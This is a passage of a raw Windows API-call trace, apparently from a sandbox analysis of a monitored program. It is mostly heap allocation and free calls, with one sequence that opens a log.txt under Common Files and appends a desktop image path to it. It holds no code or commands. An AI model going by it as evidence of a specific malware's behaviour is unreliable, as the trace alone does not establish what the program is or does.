hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.132] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0167.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.134] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.135] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.136] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0167.136] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.136] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.137] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0167.137] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xaf5, lpOverlapped=0x0) returned 1 [0167.137] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0167.137] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xaf5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.137] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0167.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0167.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\n", cchWideChar=62, lpMultiByteStr=0x8db180, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 62 [0167.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.138] WriteFile (in: hFile=0x138, lpBuffer=0x8db138*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db138*, lpNumberOfBytesWritten=0x87f43c*=0x3d, lpOverlapped=0x0) returned 1 [0167.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.138] CloseHandle (hObject=0x138) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0167.139] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0167.139] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0167.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.141] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0167.141] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.141] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.141] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0167.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0167.142] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0167.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0167.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.145] 